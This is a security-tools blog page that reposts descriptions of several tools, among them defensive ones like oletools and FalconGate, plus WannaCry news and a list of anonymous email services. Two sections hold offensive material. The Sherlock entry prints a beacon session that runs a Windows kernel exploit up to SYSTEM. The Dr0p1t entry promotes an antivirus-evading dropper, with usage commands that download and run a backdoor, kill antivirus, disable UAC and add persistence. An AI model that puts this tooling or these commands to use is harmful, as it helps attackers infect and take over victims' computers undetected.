Nix Audit Made Easier - Nix-Auditor

A script to audit linux and unix distributions based mainly on the CIS standards and universal linux hardening guidelines. The value it brings to your auditing set of tools is:

• Speed - one can audit OS in less than 120 seconds and get report
• Accuracy - tested on CentOS and RedHat with 100% accuracy
• Customizeability - it is on github, code is easily customizeable to suit the OS type and the set of controls one needs to check.
• Simplicity - just make it executable an run!

Download Nix-Auditor

Read More

Distributed alerting for the masses! - Securitybot

Distributed alerting for the masses!

Securitybot is an open-source implementation of a distributed alerting chat bot, as described in Ryan Huber's blog post. Distributed alerting improves the monitoring efficiency of your security team and can help you catch security incidents faster and more efficiently. We've tried to remove all Dropbox-isms from this code so that setting up your own instance should be fairly painless. It should be relatively easy to install the listed requirements in a virtualenv/Docker container and simply have the bot do its thing. We also provide a simple front end to dive through the database, receive API calls, and create custom alerts for the bot to reach out to people as desired.

Deploying

This guide runs through setting up a Securitybot instance as quickly as possible with no frills. We'll be connecting it to Slack, SQL, and Duo. Once we're done, we'll have a file that looks something like main.py.

SQL

You'll need a database called securitybot on some MySQL server somewhere. We've provided a function called init_sql located in securitybot/sql.py that will initialize SQL. Currently it's set up to use the host localhost with user root and no password. You'll need to change this because of course that's not how your database is set up.

Slack

You'll need a token to be able to integrate with Slack. The best thing to do would be to create a bot user and use that token for Securitybot. You'll also want to set up a channel to which the bot will report when users specify that they haven't performed an action. Find the unique ID for that channel (it'll look similar to C123456) and be sure to invite the bot user into that channel, otherwise it won't be able to send messages.

Duo

For Duo, you'll want to create an Auth API instances, name it something clever, and keep track of the integration key, secret key, and auth API endpoint URI.

Running the bot

Take a look at the provided main.py in the root directory for an example on how to use all of these. Replace all of the global variables with whatever you found above. If the following were all generated successfully, Securitybot should be up and running. To test it, message the bot user it's assigned to and say hi. To test the process of dealing with an alert, message test to test the bot.

Architecture

Securitybot was designed to be as modular as possible. This means that it's possible to easily swap out chat systems, 2FA providers, and alerting data sources. The only system that is tightly integrated with the bot is SQL, but adding support for other databases shouldn't be difficult. Having a database allows alerts to be persistent and means that the bot doesn't lose (too much) state if there's some transient failure.

Securitybot proper

The bot itself performs a small set of functions:

1. Reads messages, interpreting them as commands.
2. Polls each user object to update their state of applicable.
3. Grabs new alerts from the database and assigns them to users or escalates on an unknown user.

Messaging, 2FA, and alert management are provided by configurable modules, and added to the bot upon initialization.

Commands

The bot handles incoming messages as commands. Command parsing and handling is done in the Securitybot class and the commands themselves are provided in two places. The functions for the commands are defined in commands.py and their structure is defined in commands.yaml under the config/ directory.

Messaging

Securitybot is designed to be compatible with a wide variety of messaging systems. We currently provide bindings for Slack, but feel free to contribute any other plugins, like for Gitter or Zulip, upstream. Messaging is made possible by securitybot/chat/chat.py which provides a small number of functions for querying users in a messaging group, messaging those users, and sending messages to a specific channel/room. To add bindings for a new messaging system, subclass Chat.

2FA

2FA support is provided by auth/auth.py, which wraps async 2FA in a few functions that enable checking for 2FA capability, starting a 2FA session, and polling the state of the 2FA session. We provide support for Duo Push via the Duo Auth API, but adding support for a different product or some in-house 2FA solution is as easy as creating a subclass of Auth.

Task management

Task management is provided by tasker/tasker.py and the Tasker class. Since alerts are logged in an SQL database, the provided Tasker is SQLTasker. This provides support for grabbing new tasks and updating them via individual Task objects.

Blacklists

Blacklists are handled by the SQL database, provided in blacklist/blacklist.py and the subclass blacklist/sql_blacklist.py.

Users

The User object provides support for handling user state. We keep track of whatever information a messaging system gives to us, but really only ever use a user's unique ID and username in order to contact them.

Alerts

Alerts are uniquely identified by a SHA-256 hash which comes from some hash of the event that generated them. We assume that a SHA-256 hash is sufficiently random for there to be no collisions. If you encounter a SHA-256 collision, please contact someone at your nearest University and enjoy the fame and fortune it brings upon you.

Download Securitybot

Read More

Tools to analyze MS OLE2 files and MS Office documents, for malware analysis, forensics and debugging - oletools

oletools is a package of python tools to analyze Microsoft OLE2 files (also called Structured Storage, Compound File Binary Format or Compound Document File Format), such as Microsoft Office documents or Outlook messages, mainly for malware analysis, forensics and debugging. It is based on the olefile parser. See http://www.decalage.info/python/oletools for more info.

News

• 2016-11-01 v0.50: all oletools now support python 2 and 3.
  • olevba: several bugfixes and improvements.
  • mraptor: improved detection, added mraptor_milter for Sendmail/Postfix integration.
  • rtfobj: brand new RTF parser, obfuscation-aware, improved display, detect executable files in OLE Package objects.
  • setup: now creates handy command-line scripts to run oletools from any directory.
• 2016-06-10 v0.47: olevba added PPT97 macros support, improved handling of malformed/incomplete documents, improved error handling and JSON output, now returns an exit code based on analysis results, new --relaxed option. rtfobj: improved parsing to handle obfuscated RTF documents, added -d option to set output dir. Moved repository and documentation to GitHub.
• 2016-04-19 v0.46: olevba does not deobfuscate VBA expressions by default (much faster), new option --deobf to enable it. Fixed color display bug on Windows for several tools.
• 2016-04-12 v0.45: improved rtfobj to handle several anti-analysis tricks, improved olevba to export results in JSON format.

See the full changelog for more information.

Tools:

• olebrowse: A simple GUI to browse OLE files (e.g. MS Word, Excel, Powerpoint documents), to view and extract individual data streams.
• oleid: to analyze OLE files to detect specific characteristics usually found in malicious files.
• olemeta: to extract all standard properties (metadata) from OLE files.
• oletimes: to extract creation and modification timestamps of all streams and storages.
• oledir: to display all the directory entries of an OLE file, including free and orphaned entries.
• olemap: to display a map of all the sectors in an OLE file.
• olevba: to extract and analyze VBA Macro source code from MS Office documents (OLE and OpenXML).
• MacroRaptor: to detect malicious VBA Macros
• pyxswf: to detect, extract and analyze Flash objects (SWF) that may be embedded in files such as MS Office documents (e.g. Word, Excel) and RTF, which is especially useful for malware analysis.
• oleobj: to extract embedded objects from OLE files.
• rtfobj: to extract embedded objects from RTF files.
• and a few others (coming soon)

Projects using oletools:

oletools are used by a number of projects and online malware analysis services, including Viper, REMnux, FAME, Hybrid-analysis.com, Joe Sandbox, Deepviz, Laika BOSS, Cuckoo Sandbox, Anlyz.io, ViperMonkey, pcodedmp, dridex.malwareconfig.com, and probably VirusTotal. (Please contact me if you have or know a project using oletools)

Download and Install:
The recommended way to download and install/update the latest stable release of oletools is to use pip:

• On Linux/Mac:  Sudo -H pip install -U oletools
• On Windows:  Pip install -U oletools 

This should automatically create command-line scripts to run each tool from any directory: olevba, mraptor, rtfobj, etc.
To get the latest development version instead:

• On Linux/Mac: sudo -H pip install -U https://github.com/decalage2/oletools/archive/master.zip
• On Windows: pip install -U https://github.com/decalage2/oletools/archive/master.zip

See the documentation for other installation options.

Documentation:
The latest version of the documentation can be found online, otherwise a copy is provided in the doc subfolder of the package.

Download oletools

Read More

Tool to find missing Windows patches for Local Privilege Escalation Vulnerabilities - Sherlock

PowerShell script to quickly find missing Microsoft patches for local privilege escalation vulnerabilities.

Currently looks for:

• MS10-015 : User Mode to Ring (KiTrap0D)
• MS10-092 : Task Scheduler
• MS13-053 : NTUserMessageCall Win32k Kernel Pool Overflow
• MS13-081 : TrackPopupMenuEx Win32k NULL Page
• MS14-058 : TrackPopupMenu Win32k Null Pointer Dereference
• MS15-051 : ClientCopyImage Win32k
• MS15-078 : Font Driver Buffer Overflow
• MS16-016 : 'mrxdav.sys' WebDAV
• MS16-032 : Secondary Logon Handle

Tested on:

• Windows 7 SP1 32-bit
• Windows 7 SP1 64-bit
• Windows 8 64-bit
• Windows 10 64-bit

Basic Usage:

beacon> getuid
[*] Tasked beacon to get userid
[+] host called home, sent: 20 bytes
[*] You are Win7-x64\Rasta

beacon> powershell-import C:\Users\Rasta\Desktop\Sherlock.ps1
[*] Tasked beacon to import: C:\Users\Rasta\Desktop\Sherlock.ps1
[+] host called home, sent: 2960 bytes

beacon> powershell Find-AllVulns
[*] Tasked beacon to run: Find-AllVulns
[+] host called home, sent: 21 bytes
[+] received output:


Title      : User Mode to Ring (KiTrap0D)
MSBulletin : MS10-015
CVEID      : 2010-0232
Link       : https://www.exploit-db.com/exploits/11199/
VulnStatus : Not supported on 64-bit systems

Title      : Task Scheduler .XML
MSBulletin : MS10-092
CVEID      : 2010-3338, 2010-3888
Link       : https://www.exploit-db.com/exploits/19930/
VulnStatus : Not Vulnerable

Title      : NTUserMessageCall Win32k Kernel Pool Overflow
MSBulletin : MS13-053
CVEID      : 2013-1300
Link       : https://www.exploit-db.com/exploits/33213/
VulnStatus : Not supported on 64-bit systems

Title      : TrackPopupMenuEx Win32k NULL Page
MSBulletin : MS13-081
CVEID      : 2013-3881
Link       : https://www.exploit-db.com/exploits/31576/
VulnStatus : Not supported on 64-bit systems

Title      : TrackPopupMenu Win32k Null Pointer Dereference
MSBulletin : MS14-058
CVEID      : 2014-4113
Link       : https://www.exploit-db.com/exploits/35101/
VulnStatus : Appears Vulnerable

Title      : ClientCopyImage Win32k
MSBulletin : MS15-051
CVEID      : 2015-1701, 2015-2433
Link       : https://www.exploit-db.com/exploits/37367/
VulnStatus : Appears Vulnerable

Title      : Font Driver Buffer Overflow
MSBulletin : MS15-078
CVEID      : 2015-2426, 2015-2433
Link       : https://www.exploit-db.com/exploits/38222/
VulnStatus : Not Vulnerable

Title      : 'mrxdav.sys' WebDAV
MSBulletin : MS16-016
CVEID      : 2016-0051
Link       : https://www.exploit-db.com/exploits/40085/
VulnStatus : Not supported on 64-bit systems

Title      : Secondary Logon Handle
MSBulletin : MS16-032
CVEID      : 2016-0099
Link       : https://www.exploit-db.com/exploits/39719/
VulnStatus : Appears Vulnerable

beacon> elevate ms14-058 smb
[*] Tasked beacon to elevate and spawn windows/beacon_smb/bind_pipe (127.0.0.1:1337)
[+] host called home, sent: 105015 bytes
[+] received output:
[*] Getting Windows version...
[*] Solving symbols...
[*] Requesting Kernel loaded modules...
[*] pZwQuerySystemInformation required length 51216
[*] Parsing SYSTEM_INFO...
[*] 173 Kernel modules found
[*] Checking module \SystemRoot\system32\ntoskrnl.exe
[*] Good! nt found as ntoskrnl.exe at 0x0264f000
[*] ntoskrnl.exe loaded in userspace at: 40000000
[*] pPsLookupProcessByProcessId in kernel: 0xFFFFF800029A21FC
[*] pPsReferencePrimaryToken in kernel: 0xFFFFF800029A59D0
[*] Registering class...
[*] Creating window...
[*] Allocating null page...
[*] Getting PtiCurrent...
[*] Good! dwThreadInfoPtr 0xFFFFF900C1E7B8B0
[*] Creating a fake structure at NULL...
[*] Triggering vulnerability...
[!] Executing payload...

[+] host called home, sent: 204885 bytes
[+] established link to child beacon: 192.168.56.105

[+] established link to parent beacon: 192.168.56.105
beacon> getuid
[*] Tasked beacon to get userid
[+] host called home, sent: 8 bytes
[*] You are NT AUTHORITY\SYSTEM (admin)

Download Sherlock

Read More

A smart gateway to stop hackers and Malware attacks - FalconGate

A smart gateway to stop hackers, Malware and more...

Motivation

Cyber attacks are on the raise. Hacker and cyber criminals are continuously improving their methods and building new tools and Malware with the purpose of hacking your network, spying on you and stealing valuable data. Recently a new business model has become popular among hackers: the use of Ransomware to encrypt your data and ask for a ransom to unlock it. These attacks have extended also to the Internet of Things (IoT) devices since many of them are vulnerable by design and hackers can leverage them to compromise other devices in your network or launch DDoS attacks towards other targets. Traditionally securing a network against such attacks has been an expensive item which could be afforded just by medium to large companies. With FalconGate we're aiming to change this and bring "out of the box" security for free to people, small businesses and anyone else in need.

Features

FalconGate is an open source smart gateway which can protect your home devices against hackers, Malware like Ransomeware and other threats. It detects and alerts on hacker intrusions on your home network as well as other devices misbehaving and attacking targets within your network or in the Internet.
Currently FalconGate is able to:

• Block several types of Malware based on open source blacklists (see detailed list in file intel-sources.md )
• Block Malware using the Tor network
• Detect and report potential Malware DNS requests based on VirusTotal reports
• Detect and report the presence of Malware executables and other components based on VirusTotal reports
• Detect and report Domain Generation Algorithm (DGA) Malware patterns
• Detect and report on Malware spamming activity
• Detect and report on internal and outbound port scans
• Report details of all new devices connected to your network
• Block ads based on open source lists
• Monitor a custom list of personal or family accounts used in online services for public reports of hacking

Getting Started

FalconGate was built on top of other open source software so it has multiple dependencies which must be configured correctly for it to work. The fastest way to get FalconGate up and running is to deploy one of the supported system images from our downloads page .

Supported Platforms

Currently FalconGate has been successfully tested and implemented on Raspberry Pi (RPi 2 model B) and Banana Pi (BPI-M2+) using Raspian Jessie Lite as base image.
Jessie Lite for RPi
Jessie Lite for BPi
It should be compatible with other Debian ARM images as well but this has not been tested yet.

Prerequisites

FalconGate has a number of software dependencies:

• Bro IDS
• Python 2.7
• Nginx
• Dnsmasq
• Exim
• PHP

It depends also on several Python modules (see requirements.txt file for details)

Other dependencies

The devices's malware detection can be enhanced with the utilization of VirusTotal's personal free API
Currently FalconGate uses have i been pwned public API to detect whether credentials and/or other data from personal accounts have been stolen by hackers from third party sites.

Deploying FalconGate from a supported image

This is the fastest way to get FalconGate up and running in your network.

• Download the correct system image for your device from the downloads page .
  
• Extract the image to a folder in your computer.
  
• Write the image to your SD card.
  

You can use the guides below as reference for Raspberry Pi:
Linux
Mac OS
Windows

• Insert the SD card in your device and plug it to any available ethernet port in your router.
  
• Power on your device and wait few minutes until it will acquire the correct configuration for your network.
  
• Login to your router and disable its DHCP server function
  
• Login to FalconGate's web app and configure the email address(es) to be used as recipients for alerts and your VirusTotal API key
  

https://[FalconGate IP address]
Username: admin
Password: falcongate

Usually FalconGate will assign to its administration interface an IP ending in ".2" (e.g. 192.168.0.2) which is derived from the network's gateway IP Change the default password after the first logon to the application

• Navigate to the "Configuration" page and fill in the correct fields

This configuration it's not mandatory but highly desired if you want to unleash FalconGate's full power. In order to obtain a free VirusTotal API key you must register at ( https://www.virustotal.com/ ).

Installing FalconGate from source

Follow the steps below to configure your device and install FalconGate from this repository.

• Download and install the OS image to your Raspberry Pi or Banana Pi device

This is well documented in multiple sources out there.

• Connect to your device via SSH

$ ssh pi@<IP assigned to your RPi>

• Install Git if you don't have it yet

$ sudo apt-get update
$ sudo apt-get install git

• Clone FalconGate's repository to a local folder

$ cd /opt
$ sudo git clone https://github.com/A3sal0n/FalconGate.git

• Run the installation script inside FalconGate's folder

$ cd FalconGate/
$ sudo python install.py

Now you can go for a walk and prepare a coffee or any other beverage of your choice because the installation usually takes some time. The script will print the progress to the console.
The script should finish without issues if you're using the supported platforms. If you're attempting to install FalconGate experimentally to a new hardware platform/OS and you get some errors during the installation you could try to correct the issues manually and continue to execute the steps listed in the installation script.

• Login to your router and disable its DHCP server function

FalconGate was designed to work connected to a router over ethernet. It does not replaces the functions of your router. Instead it becomes a layer of security between your devices and your router. Disabling your router's DHCP allows FalconGate to become the new gateway for all the devices connected to the same router in your VLAN.

• Reboot your device to apply all the configuration changes
  
• Login to FalconGate's web app and configure the email address(es) to be used as recipients for alerts and your VirusTotal API key
  

Deployment

Some important considerations to keep in mind when deploying FalconGate to a real environment: home or production network.

• Change the default SSH password in your Raspberry Pi or Banana Pi devices
• Regenerate the openssh-server certificates for SSH encryption

Limitations

Currently the RPi 2 model B and the Banana Pi M2+ have both a single ethernet interface so the traffic forwarding in the gateway it's done using this single interface. This has an impact in networks with fast Internet connection (e.g. > 50Mb/s). However it's still good enough for the home networks of many people's and even some small businesses.

Download FalconGate

Read More

A Framework That Creates An Advanced FUD Dropper With Some Tricks - Dr0p1t-Framework 1.2

Have you ever heard about trojan droppers ?

In short dropper is type of trojans that downloads other malwares and Dr0p1t gives you the chance to create a dropper that bypass most AVs and have some tricks ;)

Features

• Framework works with Windows and Linux
• Download executable on target system and execute it silently..
• The executable size small compared to other droppers generated the same way
• Self destruct function so that the dropper will kill and delete itself after finishing it work
• Adding executable after downloading it to startup
• Adding executable after downloading it to task scheduler ( UAC not matters )
• Finding and killing the antivirus before running the malware
• Running a custom ( batch|powershell|vbs ) file you have chosen before running the executable
• The ability to disable UAC
• In running powershell scripts it can bypass execution policy
• Using UPX to compress the dropper after creating it
• Choose an icon for the dropper after creating it

Screenshots

On Windows

On Linux (Backbox)

Help menu

Usage: Dr0p1t.py Malware_Url [Options]

options:
  -h, --help   show this help message and exit
  -s           Add your malware to startup (Persistence)
  -t           Add your malware to task scheduler (Persistence)
  -k           Kill antivirus process before running your malware.
  -b           Run this batch script before running your malware. Check scripts folder
  -p           Run this powershell script before running your malware. Check scripts folder
  -v           Run this vbs script before running your malware. Check scripts folder
  --only32     Download your malware for 32 bit devices only
  --only64     Download your malware for 64 bit devices only
  --upx        Use UPX to compress the final file.
  --nouac      Disable UAC on victim device
  --nocompile  Tell the framework to not compile the final file.
  -i           Use icon to the final file. Check icons folder.
  -q           Stay quite ( no banner )
  -u           Check for updates
  -nd          Display less output information

Examples

./Dr0p1t.py https://test.com/backdoor.exe -s -t -k --upx
./Dr0p1t.py https://test.com/backdoor.exe -k -b block_online_scan.bat --only32
./Dr0p1t.py https://test.com/backdoor.exe -s -t -k -p Enable_PSRemoting.ps1
./Dr0p1t.py https://test.com/backdoor.exe -s -t -k --nouac -i flash.ico

Prerequisites

• Python 2 or Python 3.

The recommended version for Python 2 is 2.7.x , the recommended version for Python 3 is 3.5.x and don't use 3.6 because it's not supported yet by PyInstaller

• Python libraries requirements in requirements.txt

Needed dependencies for linux

• Wine
• Python 2.7 on Wine Machine

Note : You must have root access

Installation
if you are on linux and do

git clone https://github.com/D4Vinci/Dr0p1t-Framework
chmod 777 -R Dr0p1t-Framework
cd Dr0p1t-Framework
pip install -r requirements.txt
./Dr0p1t.py

And if you are on windows download it and then do

cd Dr0p1t-Framework
pip install -r requirements.txt
pip install -r windows_requirements.txt
./Dr0p1t.py

Libraries in windows_requirements.txt are used to enable unicodes in windows which will make coloring possible 

Tested on:

• Kali Linux - SANA
• Ubuntu 14.04-16.04 LTS
• Windows 10/8.1/8

Changelog v1.2

• Pyinstaller compiling in Linux using wine
• Pyinstaller compiling in Windows will not use UPX and that will fix the compiling in windows
• Added the ability to disable and bypass UAC
• Updated the antivirus list in the antivirus killer
• Added SelfDestruct function so that the dropper will kill and delete itself after finishing it work 
• Full framework rewrite and recheck to fix errors, typos and replacing some libraries to make the size of the final file smaller
• Started working in some SE tricks to fool the user and there's a lot of good options in the way ;) Stay Tuned

Contact

• Twitter
• Facebook

Download Dr0p1t-Framework

Read More

WannaCry Ransomware Decryption Tool - WanaKiwi

If your PC has been infected by WannaCry – the ransomware that wreaked havoc across the world last Friday – you might be lucky to get your locked files back without paying the ransom of $300 to the cyber criminals.

Adrien Guinet, a French security researcher from Quarkslab, has discovered a way to retrieve the secret encryption keys used by the WannaCry ransomware for free, which works on Windows XP, Windows 7, Windows Vista, Windows Server 2003 and 2008 operating systems.

WannaCry Ransomware Decryption Keys

The WannaCry's encryption scheme works by generating a pair of keys on the victim's computer that rely on prime numbers, a "public" key and a "private" key for encrypting and decrypting the system’s files respectively.
To prevent the victim from accessing the private key and decrypting locked files himself, WannaCry erases the key from the system, leaving no choice for the victims to retrieve the decryption key except paying the ransom to the attacker.

But here's the kicker: WannaCry "does not erase the prime numbers from memory before freeing the associated memory," says Guinet.

Based on this finding, Guinet released a WannaCry ransomware decryption tool, named WannaKey, that basically tries to retrieve the two prime numbers, used in the formula to generate encryption keys from memory, and works on Windows XP only.

Note: Below I have also mentioned another tool, dubbed WanaKiwi, that works for Windows XP to Windows 7.

"It does so by searching for them in the wcry.exe process. This is the process that generates the RSA private key. The main issue is that the CryptDestroyKey and CryptReleaseContext does not erase the prime numbers from memory before freeing the associated memory." says Guinet

So, that means, this method will work only if:

• The affected computer has not been rebooted after being infected.
• The associated memory has not been allocated and erased by some other process.

"In order to work, your computer must not have been rebooted after being infected. Please also note that you need some luck for this to work (see below), and so it might not work in every case!," Guinet says.

"This is not really a mistake from the ransomware authors, as they properly use the Windows Crypto API."
While WannaKey only pulls prime numbers from the memory of the affected computer, the tool can only be used by those who can use those prime numbers to generate the decryption key manually to decrypt their WannaCry-infected PC’s files.

WanaKiwi: WannaCry Ransomware Decryption Tool

Good news is that another security researcher, Benjamin Delpy, developed an easy-to-use tool called "WanaKiwi," based on Guinet's finding, which simplifies the whole process of the WannaCry-infected file decryption.

All victims have to do is download WanaKiwi tool from Github and run it on their affected Windows computer using the command line (cmd).

WanaKiwi works on Windows XP, Windows 7, Windows Vista, Windows Server 2003 and 2008, confirmed Matt Suiche from security firm Comae Technologies, who has also provided some demonstrations showing how to use WanaKiwi to decrypt your files.

Although the tool won't work for every user due to its dependencies, still it gives some hope to WannaCry's victims of getting their locked files back for free even from Windows XP, the aging, largely unsupported version of Microsoft's operating system.


Source:The Hacker News

Download  WanaKiwi

Read More

That's Hitting World Right Now Uses NSA Windows Exploit - WannaCry Ransomware

Earlier today, a massive ransomware campaign hit computer systems of hundreds of private companies and public organizations across the globe – which is believed to be the most massive ransomware delivery campaign to date.

The Ransomware in question has been identified as a variant of ransomware known as WannaCry (also known as 'Wana Decrypt0r,' 'WannaCryptor' or 'WCRY').

Like other nasty ransomware variants, WannaCry also blocks access to a computer or its files and demands money to unlock it.

Once infected with the WannaCry ransomware, victims are asked to pay up to $300 in order to remove the infection from their PCs; otherwise, their PCs render unusable, and their files remain locked.

In separate news, researchers have also discovered a massive malicious email campaign that's spreading the Jaff ransomware at the rate of 5 million emails per hour and hitting computers across the globe.

Ransomware Using NSA's Exploit to Spread Rapidly

What's interesting about this ransomware is that WannaCry attackers are leveraging a Windows exploit harvested from the NSA called EternalBlue, which was dumped by the Shadow Brokers hacking group over a month ago.

Microsoft released a patch for the vulnerability in March (MS17-010), but many users and organizations who did not patch their systems are open to attacks.

The exploit has the capability to penetrate into machines running unpatched version of Windows XP through 2008 R2 by exploiting flaws in Microsoft Windows SMB Server. This is why WannaCry campaign is spreading at an astonishing pace.

Once a single computer in your organization is hit by the WannaCry ransomware, the worm looks for other vulnerable computers and infects them as well.

Infections from All Around the World

In just a few hours, the ransomware targeted over 45,000 computers in 74 countries, including United States, Russia, Germany, Turkey, Italy, Philippines and Vietnam, and that the number was still growing, according to Kaspersky Labs.

According to a report, the ransomware attack has shut down work at 16 hospitals across the UK after doctors got blocked from accessing patient files. Another report says, 85% of computers at the Spanish telecom firm, Telefonica, has get infected with this malware.

Another independent security researcher, MalwareTech, reported that a large number of U.S. organizations (at least 1,600) have been hit by WannaCry, compared to 11,200 in Russia and 6,500 in China.

Screenshots of the WannaCry ransomware with different languages, including English, Spanish, Italian, were also shared online by various users and experts on Twitter.

Bitcoin wallets seemingly associated with WannaCry were reportedly started filling up with cash.

The Spanish computer emergency response organization (CCN-CERT) has even issued an alert that warns users of the "massive attack of ransomware" from WannaCry, saying (translated version):

"The ransomware, a version of WannaCry, infects the machine by encrypting all its files and, using a remote command execution vulnerability through SMB, is distributed to other Windows machines on the same network."

It is unclear how the WannaCry ransomware is infecting systems, but obvious attack vector can be phishing emails or victims visiting a website containing malware.

"Power firm Iberdrola and utility provider Gas Natural were also reported to have suffered from the outbreak.," according to BBC.

How to Protect Yourself from WannaCry

First of all, if you haven't patched your Windows machines and servers against EternalBlue exploit (MS17-010), do it right now.

To safeguard against such ransomware infection, you should always be suspicious of uninvited documents sent an email and should never click on links inside those documents unless verifying the source.

To always have a tight grip on all your important files and documents, keep a good backup routine in place that makes their copies to an external storage device that is not always connected to your PC.

Moreover, make sure that you run an active anti-virus security suite of tools on your system, and most importantly, always browse the Internet safely.


Source: The Hacker News

Read More

20 Sites To Keep Your Identity Hidden - Send Anonymous Emails

The first question to answer here is why go for anonymous email when there are plenty of premium featured and free email services such as Gmail, Outlook and Yahoo! Mail available? Well, privacy and anonymity is a digital right — our digital right. These email services are ‘free’ because of the advertisements.

Although deemed necessary evils, ads are mostly tailored for the visitor or service user, and to do that, service providers need your data to show you advertisements targeted to you and your user group. These are ads that you are most likely to click and/or follow.

Moreover, the disclosure of the motives of secret agencies and their top-secret internet-censoring programs (such as PRISM) has raised concerns among digital privacy advocates. If you want to keep your emails away from prying eyes, this article will introduce to you the many options for sending and receiving anonymous emails.

Anonymous email forms the basic foundation of anonymity over the web. Internet is no secure storage, but you have a say in who has access to your data and who doesn’t. If that is no, anonymous emails is one way to ensure your emails are not trackable online.

Note: Anonymity is not possible on the web without hiding your IP address, so you must use Tor, or any other proxy or VPN service before using the services below to remain anonymous on the Internet.
Encrypted / Anonymous Email Service
Here are some of the anonymous email services that lets you send and receive emails anonymously online. Some of them have encryption features, others are disposable or will self-destruct after a specified period of time. Here are 5.

Anonymous Email – TorGuard – This service provides you an anonymous inbox with lots of privacy and cryptographic features. You get 10MB storage, and end-to-end security using SSL encryption for connection and G/PGP encryption for securing the messages.

Tor Mail – Tor Mail is a Tor Hidden service that provides truly anonymous email service. It runs on the hidden service network of The Tor Project so you must use Tor to access and use it. Tor Mail is developed for super anonymity. As it’s built over the Tor network, it cannot be traced easily.

GuerrilaMail – GuerrillaMail offers you a disposable, self-destructible, temporary email address to send and receive emails anonymously on the internet. Mail is deleted after an hour. You only need to choose an email address; no personal data is required.

Secure Mail – This service encrypts your mail using 4096-bit key, which makes it unreadable by anyone except you. It doesn’t ask for your personal information or IP address to sign up. They also have a zero-tolerance policy against spam.

The Anonymous Email – Create an account to send and receive emails by signing up with your real email. None of your other personal info is necessary.

Send Emails Without Registration

Sometimes you just need to send emails without prior registration. In fact you don’t even need to receive any feedback. If this is you, here are 8 services that is essentially a form where you put in details of the email you want to send. Note that there is no way for the receiver to get back to you.

AnonymousEmail.me – Here you will find only a simple form to fill in the receiver’s address, subject and the email content (you can also attach a file to the email if necessary). To get a reply, opt to provide a reply-to email address, otherwise this is a one-way ticket to sending an anonymous email.

5ymail – Send and receive beautifully formatted messages using its rich-text editor without revealing your true self. You will have to give up a real email to receive your 5ymail inbox credentals. There is also a paid version for more features.

CyberAtlantis – It offers a simple interface to provide the receiver’s email address, subject, and the message. It strips off the IP address from your mail, and thus you can’t be traced easily. It asks for none of your personal information.

W3 Anonymous Remailer – Send anonymous emails to anyone. You only need to enter the receiver’s email address, subject and the message for the email.

Send Anonymous Email – This one operates with a plain interface to enter the sender and receiver’s address, subject and message. No other details are required to send emails with this. The IP addresses are logged in.

Send Email Message – You only need to enter the receiver’s email address, subject, and the message. Over 100,000 anonymous emails are sent every day for free.

AnonEmail – You get to send anonymous emails without revealing any information about your identity.

Receive Emails

If you just need a disposable email to confirm links and don’t want to deal with the newsletter or other deals they might send you in the future, try these 7 email services. Accounts are created automatically when a mail is received for that address.

Anonymous Email – Hide My Ass! – Hide My Ass! offers a free anonymous email account, which can be used to receive (but not send) emails. You can opt for new email received notifications to be sent to your real email or even set your inbox to “self-destruct” with an expiration date. 

myTrashMail – Get open and public email accounts created upon receiving mail or sign up for a private and password-protected one to receive mail. The accounts are temporary and will be deleted automatically after some time.

NotSharingMy.Info – NotSharingMy.Info provides you with a permanent anonymous email address to receive emails without providing any traceable and identifiable information. It only requires your real email address for signing up. All emails to the anonymous email address is forwarded to your real email address.

Mailnesia – Aside from inboxes generated automatically upon receipt of an email, Mailnesia even features an automatic confirmation-links click system which is useful if you make lots of sign-ups on web services.

Mailinator – Here is one that lets you create email inboxes quickly and even automatically. You can only receive emails with it.

Spambog – Spambog offers you a disposable (7-day purge), temporary, anonymous email inbox on the Web. You can receive, reply and forward emails but not send an original one. An email alias can be protected with a password.

TempInbox – Here’s another temporary, disposable, auto-automated email inbox service. Give any email alias to anyone and check that inbox on the website for your incoming mail.

OffSec 2017

Read More